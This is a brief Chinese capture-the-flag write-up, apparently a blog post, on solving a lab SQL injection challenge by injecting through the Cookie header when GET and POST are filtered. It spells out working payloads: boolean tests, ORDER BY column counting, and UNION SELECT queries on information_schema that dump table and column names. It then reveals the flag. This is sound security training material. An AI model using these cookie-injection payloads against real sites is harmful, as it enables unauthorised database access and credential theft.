小明写了一个博客系统,为了防注入,他上网找了一个SQL注入通用防护模块,GET/POST都过滤了哦!
http://lab1.xseclab.com/sqli8_f4af04563c22b18b51d9142ab0bfb13d/index.php?id=1
题目提示过滤了get和post,也就是说,浏览器中的url输入框等东东是不用考虑了,所以我们可以考虑下 请求头中cookie注入。
and 1=1 and 1=2常规注入测试,结果很明显
那么我们就开始order by
order by 4 order by 3可以测出来是3个字段
联合查询一下是爆出来2,3
顺手查一下数据库 用这个Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3
爆出数据库 manager_sqli8, sae_user_sqli8
Cookie: PHPSESSID=89fc744718e56193466ee905c44c2650;id=1 union select 1,(select group_concat(column_name) from information_schema.columns where table_name=0x7361655F6D616E616765725F73716C6938),3
我们先查一下sae_manager_sqli8
因为sae_user_sqli8我查过了。。里面没有啊
爆出id,username,password
答案出来了IamFlagCookieInject!
网友评论